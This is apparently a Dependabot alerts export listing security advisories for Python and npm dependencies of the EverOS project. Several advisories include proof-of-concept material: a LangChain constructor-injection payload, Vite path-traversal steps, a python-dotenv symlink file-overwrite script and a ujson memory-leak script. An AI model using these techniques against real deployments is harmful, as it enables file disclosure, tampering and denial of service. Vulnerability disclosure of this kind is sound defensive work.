0","first_patched_version":null}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N","score":7.4},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00622,"percentile":0.69689},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N","score":7.4},"cwes":[{"cwe_id":"CWE-203","name":"Observable Discrepancy"},{"cwe_id":"CWE-208","name":"Observable Timing Discrepancy"},{"cwe_id":"CWE-385","name":"Covert Timing Channel"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"ecdsa"},"severity":"high","vulnerable_version_range":">= 
0","first_patched_version":null},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/65","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/65","created_at":"2026-05-13T05:27:11Z","updated_at":"2026-05-13T05:27:11Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":64,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"ujson"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"unknown"},"security_advisory":{"ghsa_id":"GHSA-c38f-wx89-p2xg","cve_id":"CVE-2026-44660","summary":"UltraJSON has a Memory Leak in ujson.dump() on Write Failure","description":"### Summary\n\nWhen `ujson.dump()` writes to a file-like object and the write operation raises an exception, the serialized JSON string object is not decremented, leaking memory. Each failed write operation leaks the full size of the serialized payload.\n\nCode that uses `ujson.dumps()` rather than `ujson.dump()` or only JSON load/decode methods is unaffected.\n\n### Details\n\n**Vulnerability Location:**\n- `src/ujson/python/objToJSON.c:913` - `objToJSONFile()` function start\n- `src/ujson/python/objToJSON.c:931` - Error return on write failure\n- `src/ujson/python/objToJSON.c:942` - Early return without cleanup\n \n**Root Cause:**\n\nThe `objToJSONFile()` function allocates a Python string object via `ujson_dumps_internal()`, calls the file's `write()` method, and returns early if `write()` raises an exception—but never calls `Py_DECREF(string)` on the early exit path.\n\n### PoC\n```python\nimport gc, tracemalloc, ujson\n\nclass BadFile:\n def write(self, s):\n raise RuntimeError(\"boom\")\n\nobj = {\"x\": \"A\" * 200000}\n\ndef run():\n try:\n ujson.dump(obj, BadFile())\n except RuntimeError:\n pass\n\nrun()\ntracemalloc.start()\ngc.collect()\nbase = tracemalloc.get_traced_memory()[0]\n\nfor i in range(5):\n 
run()\n gc.collect()\n cur = tracemalloc.get_traced_memory()[0]\n print(i, cur - base)\n```\n\n### Impact\n\nAny application that serializes data through `ujson.dump()` to an attacker-influenced file-like object that can fail can be driven into linear memory growth. An attacker can quickly use up all the memory of say a web server that sends JSON responses using `ujson.dump()` by repeatedly making requests then closing the connection mid response.\n\n### Remediation\n\nThe missing dec-refs were added in 82af1d0ac01d09aa40c887b460d44b9d9f4bccd9. We recommend upgrading to [UltraJSON 5.12.1](https://github.com/ultrajson/ultrajson/releases/tag/5.12.1).\n\n### Workarounds\n\nReplacing `ujson.dump(obj, file)` with `file.write(ujson.dumps(obj))` is equivalent (contrary to popular misconception, there are no streaming benefits to using `ujson.dump()`) and will avoid the memory leak.","severity":"high","identifiers":[{"value":"GHSA-c38f-wx89-p2xg","type":"GHSA"},{"value":"CVE-2026-44660","type":"CVE"}],"references":[{"url":"https://github.com/ultrajson/ultrajson/security/advisories/GHSA-c38f-wx89-p2xg"},{"url":"https://github.com/ultrajson/ultrajson/commit/82af1d0ac01d09aa40c887b460d44b9d9f4bccd9"},{"url":"https://github.com/ultrajson/ultrajson/releases/tag/5.12.1"},{"url":"https://github.com/advisories/GHSA-c38f-wx89-p2xg"}],"published_at":"2026-05-12T22:25:11Z","updated_at":"2026-05-12T22:25:12Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"ujson"},"severity":"high","vulnerable_version_range":"<= 5.12.0","first_patched_version":{"identifier":"5.12.1"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N","score":8.7}},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-401","name":"Missing Release of Memory after Effective 
Lifetime"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"ujson"},"severity":"high","vulnerable_version_range":"<= 5.12.0","first_patched_version":{"identifier":"5.12.1"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/64","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/64","created_at":"2026-05-13T03:39:13Z","updated_at":"2026-05-13T05:27:11Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:11Z","auto_dismissed_at":null},{"number":63,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"urllib3"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-qccp-gfcp-xxvc","cve_id":"CVE-2026-44431","summary":"urllib3: Sensitive headers forwarded across origins in proxied low-level redirects","description":"### Impact\n\nWhen following cross-origin redirects for requests made using urllib3’s high-level APIs, such as `urllib3.request()`, `PoolManager.request()`, and `ProxyManager.request()`, sensitive headers — `Authorization`, `Cookie`, and `Proxy-Authorization` (defined in `Retry.DEFAULT_REMOVE_HEADERS_ON_REDIRECT`) — are stripped by default, as expected.\n\nHowever, cross-origin redirects followed from the low-level API via `ProxyManager.connection_from_url().urlopen(..., assert_same_host=False)` still forward these sensitive headers.\n\n### Affected usage\n\nApplications and libraries using urllib3 versions earlier than 2.7.0 may be affected if they allow cross-origin redirects while making requests through `HTTPConnection.urlopen()` instances created via `ProxyManager.connection_from_url()`.\n\n### Remediation\n\nUpgrade to urllib3 version 2.7.0 or later, in which sensitive headers are stripped from redirects followed by `HTTPConnection`.\n\nIf upgrading is not immediately possible, avoid 
using this low-level redirect flow for cross-origin redirects. If appropriate for your use case, switch to `ProxyManager.request()`.","severity":"high","identifiers":[{"value":"GHSA-qccp-gfcp-xxvc","type":"GHSA"},{"value":"CVE-2026-44431","type":"CVE"}],"references":[{"url":"https://github.com/urllib3/urllib3/security/advisories/GHSA-qccp-gfcp-xxvc"},{"url":"https://github.com/advisories/GHSA-qccp-gfcp-xxvc"}],"published_at":"2026-05-11T14:51:20Z","updated_at":"2026-05-11T14:51:22Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"urllib3"},"severity":"high","vulnerable_version_range":">= 1.23, < 2.7.0","first_patched_version":{"identifier":"2.7.0"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N","score":8.2}},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-200","name":"Exposure of Sensitive Information to an Unauthorized Actor"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"urllib3"},"severity":"high","vulnerable_version_range":">= 1.23, < 2.7.0","first_patched_version":{"identifier":"2.7.0"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/63","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/63","created_at":"2026-05-12T10:55:55Z","updated_at":"2026-05-13T05:27:11Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:11Z","auto_dismissed_at":null},{"number":62,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"langchain-core"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-pjwx-r37v-7724","cve_id":"CVE-2026-44843","summary":"LangChain vulnerable to unsafe deserialization of attacker-controlled objects through overly broad `load()` 
allowlists","description":"LangChain contains older runtime code paths that deserialize run inputs, run outputs, or other application-controlled payloads using overly broad object allowlists. These paths may call `load()` with `allowed_objects=\"all\"`. This does not enable arbitrary Python object deserialization, but it does allow any trusted LangChain-serializable object to be revived, which is broader than these runtime paths require. As a result, attacker-supplied LangChain serialized constructor dictionaries may cause trusted runtime paths to instantiate classes with untrusted constructor arguments.\n\nApplications are exposed only when all of the following are true:\n\n1. The application accepts untrusted structured input, such as JSON, from a user or network request.\n2. The application does not validate or canonicalize that input into an inert schema before invoking LangChain.\n3. Attacker-controlled nested dictionaries or lists are preserved in LangChain run inputs or outputs.\n4. The application uses an affected API path that later deserializes that run data.\n\nKnown affected runtime surfaces include:\n\n- `RunnableWithMessageHistory`\n- `astream_log()`\n- `astream_events(version=\"v1\")`\n\nRelated unsafe deserialization patterns may also affect applications that explicitly load serialized LangChain prompt or runnable objects from untrusted sources, including shared prompt stores, Hub artifacts with model configuration, or other application-controlled serialization stores.\n\nApplications that validate incoming requests against a fixed schema, such as coercing user input to a plain string or message-content field before invoking LangChain, are unlikely to expose this deserialization primitive.\n\nThis release also fixes a related secret-marker validation bypass in the serialization and deserialization layer (`_is_lc_secret`). 
That issue creates an additional path by which attacker-controlled constructor dictionaries can avoid escaping during `dumps()` -> `loads()` round-trips and reach LangChain object revival logic.\n\n## Impact\n\nAn attacker who can submit untrusted structured input to an affected application, and have that structure preserved in LangChain run data, may be able to inject LangChain serialized constructor payloads such as:\n\n```json\n{\n \"lc\": 1,\n \"type\": \"constructor\",\n \"id\": [\"langchain_core\", \"messages\", \"ai\", \"AIMessage\"],\n \"kwargs\": {\"content\": \"attacker-controlled content\"}\n}\n```\n\nIf this payload reaches a broad `load()` call, LangChain may instantiate the referenced class instead of treating the payload as inert user data.\n\nRealistic impacts include:\n\n- Persistent chat-history poisoning when revived `AIMessage`, `HumanMessage`, or `SystemMessage` objects are stored by `RunnableWithMessageHistory`.\n- Prompt injection or behavior manipulation if attacker-controlled messages are later included in model context.\n- Instantiation of unexpected trusted LangChain objects with attacker-controlled constructor arguments.\n- Possible credential disclosure or server-side requests if a reachable object reads environment credentials, creates clients, or contacts attacker-controlled endpoints during initialization.\n- Additional prompt-template or runnable-configuration impacts in applications that separately load and execute untrusted serialized LangChain objects.\n\n## Remediation\n\nLangChain will deprecate the affected APIs as part of this fix:\n\n- `RunnableWithMessageHistory`\n- `astream_log()`\n- `astream_events(version=\"v1\")`\n\nThese are older code paths that are no longer recommended for new applications. They were not previously marked as deprecated, but recent LangChain documentation has primarily directed users toward newer streaming and memory patterns, including the `stream` API. 
Applications should migrate to the currently recommended APIs rather than continue depending on these older surfaces.\n\nSeparately, LangChain will update `load()` and `loads()` to tighten deserialization behavior so broad object revival is not applied implicitly to untrusted or application-controlled payloads. The older runtime surfaces listed above are being deprecated rather than preserved as supported paths for broad runtime deserialization.\n\nThis release also fixes a related secret-marker validation bypass in the serialization and deserialization layer (`_is_lc_secret`). That issue creates an additional path by which attacker-controlled constructor dictionaries can avoid escaping during `dumps()` -> `loads()` round-trips and reach LangChain object revival logic.\n\n## Guidance for `load()` and `loads()`\n\n`load()` and `loads()` should be used only with trusted LangChain manifests or serialized objects from trusted storage. Do not pass user-controlled data to `load()` or `loads()`, and do not use them as general parsers for request bodies, tool inputs, chat messages, or other attacker-controlled data.\n\n`load()` and `loads()` are beta APIs, and their behavior may change as LangChain narrows unsafe defaults. Future LangChain versions will require callers to be explicit about which objects may be revived. 
Users should pass a narrow `allowed_objects` value appropriate for the specific trusted manifest they are loading, rather than relying on broad defaults or `allowed_objects=\"all\"`, which permits the full trusted LangChain serialization allowlist.\n\n## Credits\n\nThe original issue was first reported by @u-ktdi.\n\nSimilar findings were reported by @dewankpant, @shrutilohani, @Moaaz-0x, @pucagit.\n\nA related `_is_lc_secret` marker bypass affecting `dumps()` -> `loads()` round-trips was reported by @yardenporat353 (and a similar report by @localhost-detect)","severity":"high","identifiers":[{"value":"GHSA-pjwx-r37v-7724","type":"GHSA"},{"value":"CVE-2026-44843","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langchain/security/advisories/GHSA-pjwx-r37v-7724"},{"url":"https://github.com/advisories/GHSA-pjwx-r37v-7724"}],"published_at":"2026-05-08T23:07:32Z","updated_at":"2026-05-08T23:07:34Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"high","vulnerable_version_range":">= 1.0.0, <= 1.3.2","first_patched_version":{"identifier":"1.3.3"}},{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"high","vulnerable_version_range":"<= 0.3.84","first_patched_version":{"identifier":"0.3.85"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N","score":8.2},"cvss_v4":{"vector_string":null,"score":0.0}},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N","score":8.2},"cwes":[{"cwe_id":"CWE-502","name":"Deserialization of Untrusted Data"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"high","vulnerable_version_range":">= 1.0.0, <= 
1.3.2","first_patched_version":{"identifier":"1.3.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/62","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/62","created_at":"2026-05-08T23:09:36Z","updated_at":"2026-05-13T05:27:10Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:10Z","auto_dismissed_at":null},{"number":61,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"mem0ai"},"manifest_path":"methods/evermemos/uv.lock","scope":"development","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-xqxw-r767-67m7","cve_id":"CVE-2026-7597","summary":"mem0ai mem0 has an Improper Input Validation Issue","description":"A vulnerability was found in mem0ai mem0 up to 1.0.11. This affects the function pickle.load/pickle.dump of the file mem0/vector_stores/faiss.py. Performing a manipulation results in deserialization. It is possible to initiate the attack remotely. The exploit has been made public and could be used. The patch is named 62dca096f9236010ca15fea9ba369ba740b86b7a. 
Applying a patch is the recommended action to fix this issue.","severity":"low","identifiers":[{"value":"GHSA-xqxw-r767-67m7","type":"GHSA"},{"value":"CVE-2026-7597","type":"CVE"}],"references":[{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-7597"},{"url":"https://github.com/mem0ai/mem0/issues/3778"},{"url":"https://github.com/mem0ai/mem0/pull/4833"},{"url":"https://github.com/mem0ai/mem0/commit/62dca096f9236010ca15fea9ba369ba740b86b7a"},{"url":"https://github.com/mem0ai/mem0"},{"url":"https://vuldb.com/submit/805562"},{"url":"https://vuldb.com/vuln/360550"},{"url":"https://vuldb.com/vuln/360550/cti"},{"url":"https://github.com/advisories/GHSA-xqxw-r767-67m7"}],"published_at":"2026-05-02T00:31:21Z","updated_at":"2026-05-07T20:47:22Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"mem0ai"},"severity":"low","vulnerable_version_range":"< 2.0.0b2","first_patched_version":{"identifier":"2.0.0b2"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L","score":6.3},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P","score":2.1}},"epss":{"percentage":0.00058,"percentile":0.17791},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L","score":6.3},"cwes":[{"cwe_id":"CWE-20","name":"Improper Input Validation"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"mem0ai"},"severity":"low","vulnerable_version_range":"< 
2.0.0b2","first_patched_version":{"identifier":"2.0.0b2"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/61","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/61","created_at":"2026-05-08T13:18:43Z","updated_at":"2026-05-13T05:27:10Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:10Z","auto_dismissed_at":null},{"number":60,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"python-multipart"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-pp6c-gr5w-3c5g","cve_id":"CVE-2026-42561","summary":"python-multipart has Denial of Service via unbounded multipart part headers","description":"### Summary\n\n`python-multipart` has a denial of service vulnerability in multipart part header parsing. When parsing `multipart/form-data`, `MultipartParser` previously had no limit on the number of part headers or the size of an individual part header. An attacker could send a request with either many repeated headers without terminating the header block or a single very large header value, causing excessive CPU work before request rejection or completion.\n\n### Impact\n\nApplications that parse attacker-controlled `multipart/form-data` with affected versions of `python-multipart` can experience CPU exhaustion. ASGI applications using Starlette, FastAPI, or other frameworks that invoke `python-multipart` may have worker or event-loop delays while processing malicious upload requests.\n\n### Details\n\nThe affected parser states are `HEADER_FIELD_START`, `HEADER_FIELD`, `HEADER_VALUE_START`, `HEADER_VALUE`, and `HEADER_VALUE_ALMOST_DONE`. 
The issue can be triggered by:\n\n- A multipart part with an oversized individual header value.\n- A multipart part with many repeated header lines or an unterminated header block.\n\nBoth variants are addressed by enforcing default parser limits for maximum header count and maximum header size.\n\n### Mitigation\n\nUpgrade to `python-multipart` `0.0.27` or later.\n\nIf upgrading is not immediately possible, reduce exposure by enforcing request body size limits at the server, proxy, or framework layer. This is only a mitigation; affected versions of `python-multipart` still parse multipart part headers without the default header count and header size limits.","severity":"high","identifiers":[{"value":"GHSA-pp6c-gr5w-3c5g","type":"GHSA"},{"value":"CVE-2026-42561","type":"CVE"}],"references":[{"url":"https://github.com/Kludex/python-multipart/security/advisories/GHSA-pp6c-gr5w-3c5g"},{"url":"https://github.com/advisories/GHSA-pp6c-gr5w-3c5g"}],"published_at":"2026-05-06T21:56:14Z","updated_at":"2026-05-06T21:56:16Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"python-multipart"},"severity":"high","vulnerable_version_range":"< 0.0.27","first_patched_version":{"identifier":"0.0.27"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cvss_v4":{"vector_string":null,"score":0.0}},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cwes":[{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"python-multipart"},"severity":"high","vulnerable_version_range":"< 
0.0.27","first_patched_version":{"identifier":"0.0.27"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/60","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/60","created_at":"2026-05-08T09:35:23Z","updated_at":"2026-05-13T05:27:10Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:10Z","auto_dismissed_at":null},{"number":59,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"nltk"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-68j8-pq59-fqgm","cve_id":"CVE-2026-0847","summary":"NLTK has a Path Traversal issue","description":"A vulnerability in NLTK versions up to and including 3.9.2 allows arbitrary file read via path traversal in multiple CorpusReader classes, including WordListCorpusReader, TaggedCorpusReader, and BracketParseCorpusReader. These classes fail to properly sanitize or validate file paths, enabling attackers to traverse directories and access sensitive files on the server. This issue is particularly critical in scenarios where user-controlled file inputs are processed, such as in machine learning APIs, chatbots, or NLP pipelines. 
Exploitation of this vulnerability can lead to unauthorized access to sensitive files, including system files, SSH private keys, and API tokens, and may potentially escalate to remote code execution when combined with other vulnerabilities.","severity":"high","identifiers":[{"value":"GHSA-68j8-pq59-fqgm","type":"GHSA"},{"value":"CVE-2026-0847","type":"CVE"}],"references":[{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-0847"},{"url":"https://huntr.com/bounties/fc69914f-36a9-4c18-8503-10013b39f966"},{"url":"https://github.com/advisories/GHSA-68j8-pq59-fqgm"}],"published_at":"2026-03-04T21:32:45Z","updated_at":"2026-05-06T19:18:18Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"nltk"},"severity":"high","vulnerable_version_range":"<= 3.9.2","first_patched_version":null}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L","score":8.6},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.0008,"percentile":0.23316},"cvss":{"vector_string":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L","score":8.6},"cwes":[{"cwe_id":"CWE-22","name":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"nltk"},"severity":"high","vulnerable_version_range":"<= 
3.9.2","first_patched_version":null},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/59","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/59","created_at":"2026-05-08T07:46:01Z","updated_at":"2026-05-13T05:27:10Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:10Z","auto_dismissed_at":null},{"number":58,"state":"open","dependency":{"package":{"ecosystem":"npm","name":"vite"},"manifest_path":"use-cases/game-of-throne-demo/frontend/package.json","scope":"development","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-4w7w-66w2-5vf9","cve_id":"CVE-2026-39365","summary":"Vite Vulnerable to Path Traversal in Optimized Deps `.map` Handling","description":"### Summary\n\nAny files ending with `.map` even out side the project can be returned to the browser.\n\n### Impact\n\nOnly apps that match the following conditions are affected:\n\n- explicitly exposes the Vite dev server to the network (using `--host` or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host))\n- have a sensitive content in files ending with `.map` and the path is predictable\n\n### Details\n\nIn Vite v7.3.1, the dev server’s handling of `.map` requests for optimized dependencies resolves file paths and calls `readFile` without restricting `../` segments in the URL. As a result, it is possible to bypass the [`server.fs.strict`](https://vite.dev/config/server-options#server-fs-strict) allow list and retrieve `.map` files located outside the project root, provided they can be parsed as valid source map JSON.\n\n### PoC\n1. Create a minimal PoC sourcemap outside the project root\n ```bash\n cat > /tmp/poc.map <<'EOF'\n {\"version\":3,\"file\":\"x.js\",\"sources\":[],\"names\":[],\"mappings\":\"\"}\n EOF\n ```\n2. 
Start the Vite dev server (example)\n ```bash\n pnpm -C playground/fs-serve dev --host 127.0.0.1 --port 18080\n ```\n3. Confirm that direct `/@fs` access is blocked by `strict` (returns 403)\n \"image\"\n4. Inject `../` segments under the optimized deps `.map` URL prefix to reach `/tmp/poc.map`\n \"image\"","severity":"medium","identifiers":[{"value":"GHSA-4w7w-66w2-5vf9","type":"GHSA"},{"value":"CVE-2026-39365","type":"CVE"}],"references":[{"url":"https://github.com/vitejs/vite/security/advisories/GHSA-4w7w-66w2-5vf9"},{"url":"https://github.com/vitejs/vite/pull/22161"},{"url":"https://github.com/vitejs/vite/commit/79f002f2286c03c88c7b74c511c7f9fc6dc46694"},{"url":"https://github.com/vitejs/vite/releases/tag/v6.4.2"},{"url":"https://github.com/vitejs/vite/releases/tag/v7.3.2"},{"url":"https://github.com/vitejs/vite/releases/tag/v8.0.5"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39365"},{"url":"https://github.com/advisories/GHSA-4w7w-66w2-5vf9"}],"published_at":"2026-04-06T18:03:46Z","updated_at":"2026-04-07T22:16:29Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"npm","name":"vite"},"severity":"medium","vulnerable_version_range":">= 8.0.0, <= 8.0.4","first_patched_version":{"identifier":"8.0.5"}},{"package":{"ecosystem":"npm","name":"vite"},"severity":"medium","vulnerable_version_range":">= 7.0.0, <= 7.3.1","first_patched_version":{"identifier":"7.3.2"}},{"package":{"ecosystem":"npm","name":"vite"},"severity":"medium","vulnerable_version_range":"<= 6.4.1","first_patched_version":{"identifier":"6.4.2"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N","score":6.3}},"epss":{"percentage":0.01253,"percentile":0.79481},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-22","name":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')"},{"cwe_id":"CWE-200","name":"Exposure of Sensitive Information 
to an Unauthorized Actor"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"npm","name":"vite"},"severity":"medium","vulnerable_version_range":"<= 6.4.1","first_patched_version":{"identifier":"6.4.2"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/58","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/58","created_at":"2026-04-30T08:37:38Z","updated_at":"2026-04-30T08:37:38Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":57,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"python-dotenv"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-mf9w-mj56-hr94","cve_id":"CVE-2026-28684","summary":"python-dotenv: Symlink following in set_key allows arbitrary file overwrite via cross-device rename fallback","description":"### Summary\n\n`set_key()` and `unset_key()` in python-dotenv follow symbolic links when rewriting `.env` files, allowing a local attacker to overwrite arbitrary files via a crafted symlink when a cross-device rename fallback is triggered.\n\n\n### Details\n\nThe `rewrite()` context manager in `dotenv/main.py` is used by both `set_key()` and `unset_key()` to safely modify `.env` files. It works by writing to a temporary file (created in the system's default temp directory, typically `/tmp`) and then using `shutil.move()` to replace the original file.\n\nWhen the `.env` path is a symbolic link and the temp directory resides on a different filesystem than the target (a common configuration on Linux systems using tmpfs for `/tmp`), the following sequence occurs:\n\n1. `shutil.move()` first attempts `os.rename()`, which fails with an `OSError` because atomic renames cannot cross device boundaries.\n2. 
On failure, `shutil.move()` falls back to `shutil.copy2()` followed by `os.unlink()`.\n3. `shutil.copy2()` calls `shutil.copyfile()` with `follow_symlinks=True` by default.\n4. This causes the content to be written to the **symlink target** rather than replacing the symlink itself.\n\nAn attacker who has write access to the directory containing a `.env` file can pre-place a symlink pointing to any file that the application process has write access to. When the application (or a privileged process such as a deploy script, Docker entrypoint, or CI pipeline) calls `set_key()` or `unset_key()`, the symlink target is overwritten with the new `.env` content.\n\nThis vulnerability does not require a race condition and is fully deterministic once the preconditions are met.\n\n### Impact\nThe primary impacts are to **integrity** and **availability**:\n\n- **File overwrite / destruction (DoS):** An attacker can cause an application or privileged process to corrupt or destroy configuration files, database configs, or other sensitive files it would not normally have access to modify.\n- **Integrity violation:** The target file's original content is replaced with `.env`-formatted content controlled by the attacker.\n- **Potential privilege escalation:** In scenarios where a privileged process (running as root or a service account) calls `set_key()`, the attacker can leverage this to write to files beyond their own access level.\n\nThe scope of impact depends on the application using python-dotenv and the privileges under which it runs.\n\n\n### Proof of Concept\n\nThe following script demonstrates the vulnerability. 
It requires `/tmp` and the user's home directory to reside on different devices (common on systemd-based Linux systems with tmpfs).\n\n```python\nimport os\nimport sys\nimport tempfile\nfrom dotenv import set_key\n\n# Pre-condition: /tmp must be on a different device than the target directory.\ntmp_dev = os.stat(\"/tmp\").st_dev\nhome_dev = os.stat(os.path.expanduser(\"~\")).st_dev\nassert tmp_dev != home_dev, \"Skipped: /tmp and ~ are on the same device (no cross-device move)\"\n\nwith tempfile.TemporaryDirectory(dir=os.path.expanduser(\"~\")) as workdir:\n # File an attacker wants to overwrite\n target = os.path.join(workdir, \"victim_config.txt\")\n with open(target, \"w\") as f:\n f.write(\"DB_PASSWORD=supersecret\\n\")\n\n # Attacker pre-places a symlink at the path the application will use as .env\n env_symlink = os.path.join(workdir, \".env\")\n os.symlink(target, env_symlink)\n\n before = open(target).read()\n\n # Application writes a new key -- triggers the cross-device fallback\n set_key(env_symlink, \"INJECTED\", \"attacker_value\")\n\n after = open(target).read()\n\n print(\"Before:\", repr(before))\n print(\"After: \", repr(after))\n print(\"Symlink target overwritten:\", target)\n```\n\n**Expected output:**\n```\nBefore: 'DB_PASSWORD=supersecret\\n'\nAfter: \"DB_PASSWORD=supersecret\\nINJECTED='attacker_value'\\n\"\nSymlink target overwritten: /home/user/tmp806nut2g/victim_config.txt\n```\n\n### Remediation\n\nThe fix changes the `rewrite()` context manager in the following ways:\n\n1. **Symlinks are no longer followed by default.** When the `.env` path is a symlink, `rewrite()` now resolves it to the real path before proceeding, or (by default) operates on the symlink entry itself rather than the target.\n2. **A `follow_symlinks: bool = False` parameter** is added to `set_key()` and `unset_key()` for users who explicitly need the old behavior.\n3. 
